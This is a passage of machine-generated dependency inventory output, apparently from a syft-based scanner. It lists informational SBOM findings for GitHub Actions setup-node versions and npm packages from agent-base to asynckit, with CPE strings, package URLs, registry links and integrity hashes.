cpe:2.3:a:actions\/setup_node:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v1:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/setup-node@v1 metadataType: github-actions-use-statement metadata: value: actions/setup-node@v1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f2b699c115f128e7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml startLine: 0 message: 'Package discovered: actions/setup-node v2' title: actions/setup-node v2 description: 'Package discovered: actions/setup-node v2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 94c6b30301562d90 name: actions/setup-node version: v2 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml accessPath: /node_modules/@ungap/structured-clone/.github/workflows/node.js.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v2:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/setup-node@v2 metadataType: github-actions-use-statement metadata: value: actions/setup-node@v2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c207c7fc955b5ded ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/stream-shift/.github/workflows/test.yml startLine: 0 message: 'Package discovered: actions/setup-node v3' title: actions/setup-node v3 description: 'Package discovered: actions/setup-node v3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c1170e00c0039987 name: actions/setup-node version: v3 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/stream-shift/.github/workflows/test.yml accessPath: /node_modules/stream-shift/.github/workflows/test.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v3:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/setup-node@v3 metadataType: github-actions-use-statement metadata: value: actions/setup-node@v3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 751a614666804651 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/reusify/.github/workflows/ci.yml startLine: 0 message: 'Package discovered: actions/setup-node v4' title: actions/setup-node v4 description: 'Package discovered: actions/setup-node v4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: de6527b74c32bd7a name: actions/setup-node version: v4 type: github-action foundBy: github-actions-usage-cataloger locations: - path: /node_modules/reusify/.github/workflows/ci.yml accessPath: /node_modules/reusify/.github/workflows/ci.yml annotations: evidence: primary licenses: [] language: '' cpes: - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup-node:v4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup-node:actions\/setup_node:v4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup-node:v4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup_node:actions\/setup_node:v4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup-node:v4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:actions\/setup:actions\/setup_node:v4:*:*:*:*:*:*:* source: syft-generated purl: pkg:github/actions/setup-node@v4 metadataType: github-actions-use-statement metadata: value: actions/setup-node@v4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 87ee223622bbf049 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: agent-base 6.0.2' title: agent-base 6.0.2 description: 'Package discovered: agent-base 6.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 12d1ed2dd95a1a7c name: agent-base version: 6.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:agent-base:agent-base:6.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent-base:agent_base:6.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent_base:agent-base:6.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent_base:agent_base:6.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent:agent-base:6.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent:agent_base:6.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/agent-base@6.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz integrity: sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ== dependencies: debug: '4' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3360c58589af5938 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: agent-base 7.1.4' title: agent-base 7.1.4 description: 'Package discovered: agent-base 7.1.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f7259be6132b188d name: agent-base version: 7.1.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:agent-base:agent-base:7.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent-base:agent_base:7.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent_base:agent-base:7.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent_base:agent_base:7.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent:agent-base:7.1.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:agent:agent_base:7.1.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/agent-base@7.1.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/agent-base/-/agent-base-7.1.4.tgz integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 83a9e4994a4bae21 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ansi-regex 5.0.1' title: ansi-regex 5.0.1 description: 'Package discovered: ansi-regex 5.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 434b3315d409487e name: ansi-regex version: 5.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:5.0.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/ansi-regex@5.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 55dee429ce8d0ebc ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ansi-regex 6.2.2' title: ansi-regex 6.2.2 description: 'Package discovered: ansi-regex 6.2.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 351fe1b55f0afa57 name: ansi-regex version: 6.2.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ansi-regex_project:ansi-regex:6.2.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/ansi-regex@6.2.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.2.2.tgz integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 78d002033ed5f3df ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ansi-styles 4.3.0' title: ansi-styles 4.3.0 description: 'Package discovered: ansi-styles 4.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d7348151a8592cc2 name: ansi-styles version: 4.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ansi-styles:ansi-styles:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi-styles:ansi_styles:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi_styles:ansi-styles:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi_styles:ansi_styles:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi:ansi-styles:4.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi:ansi_styles:4.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ansi-styles@4.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg== dependencies: color-convert: ^2.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5a3dc64757afbf1c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ansi-styles 6.2.3' title: ansi-styles 6.2.3 description: 'Package discovered: ansi-styles 6.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b7d3f8e2ee8c8206 name: ansi-styles version: 6.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ansi-styles:ansi-styles:6.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi-styles:ansi_styles:6.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi_styles:ansi-styles:6.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi_styles:ansi_styles:6.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi:ansi-styles:6.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ansi:ansi_styles:6.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ansi-styles@6.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.3.tgz integrity: sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a0800e7f7f0173c9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: any-promise 1.3.0' title: any-promise 1.3.0 description: 'Package discovered: any-promise 1.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dc69ebae19192ee6 name: any-promise version: 1.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:any-promise:any-promise:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:any-promise:any_promise:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:any_promise:any-promise:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:any_promise:any_promise:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:any:any-promise:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:any:any_promise:1.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/any-promise@1.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/any-promise/-/any-promise-1.3.0.tgz integrity: sha512-7UvmKalWRt1wgjL1RrGxoSJW/0QZFIegpeGvZG9kjp8vrRu55XTHbwnqq2GpXm9uLbcuhxm3IqX9OB4MZR1b2A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4e58783cc9de2b91 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: anymatch 3.1.3' title: anymatch 3.1.3 description: 'Package discovered: anymatch 3.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0f1f6d6adbfca65a name: anymatch version: 3.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:jonschlinkert:anymatch:3.1.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/anymatch@3.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz integrity: sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw== dependencies: normalize-path: ^3.0.0 picomatch: ^2.0.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c5e1f2e50730714b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: append-field 1.0.0' title: append-field 1.0.0 description: 'Package discovered: append-field 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 02ed6bf0c016d0d3 name: append-field version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:append-field:append-field:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:append-field:append_field:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:append_field:append-field:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:append_field:append_field:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:append:append-field:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:append:append_field:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/append-field@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/append-field/-/append-field-1.0.0.tgz integrity: sha512-klpgFSWLW1ZEs8svjfb7g4qWY0YS5imI82dTg+QahUvJ8YqAY0P10Uk8tTyh9ZGuYEZEMaeJYCF5BFuX552hsw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 413f489faf894e63 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: arg 5.0.2' title: arg 5.0.2 description: 'Package discovered: arg 5.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c190b80836cef557 name: arg version: 5.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:arg:arg:5.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/arg@5.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/arg/-/arg-5.0.2.tgz integrity: sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0ee2786b2f8f8ad4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: array-flatten 1.1.1' title: array-flatten 1.1.1 description: 'Package discovered: array-flatten 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f61b69e470287928 name: array-flatten version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:array-flatten:array-flatten:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:array-flatten:array_flatten:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:array_flatten:array-flatten:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:array_flatten:array_flatten:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:array:array-flatten:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:array:array_flatten:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/array-flatten@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz integrity: sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 374f7e7db72708e5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: arrify 2.0.1' title: arrify 2.0.1 description: 'Package discovered: arrify 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e733388ffa39ebc5 name: arrify version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:arrify:arrify:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/arrify@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/arrify/-/arrify-2.0.1.tgz integrity: sha512-3duEwti880xqi4eAMN8AyR4a0ByT90zoYdLlevfrvU43vb0YZwZVfxOgxWrLXXXpyugL0hNZc9G6BiB5B3nUug== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e3ccd8258c57c2f8 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: async-retry 1.3.3' title: async-retry 1.3.3 description: 'Package discovered: async-retry 1.3.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3f1747f861c5fded name: async-retry version: 1.3.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:async-retry:async-retry:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:async-retry:async_retry:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:async_retry:async-retry:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:async_retry:async_retry:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:async:async-retry:1.3.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:async:async_retry:1.3.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/async-retry@1.3.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz integrity: sha512-wfr/jstw9xNi/0teMHrRW7dsz3Lt5ARhYNZ2ewpadnhaIp5mbALhOAP+EAdsC7t4Z6wqsDVv9+W6gm1Dk9mEyw== dependencies: retry: 0.13.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c5b9a7358fc490f2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: asynckit 0.4.0' title: asynckit 0.4.0 description: 'Package discovered: asynckit 0.4.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3f371bd1625a90e5 name: asynckit version: 0.4.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:asynckit:asynckit:0.4.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/asynckit@0.4.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz integrity: sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - 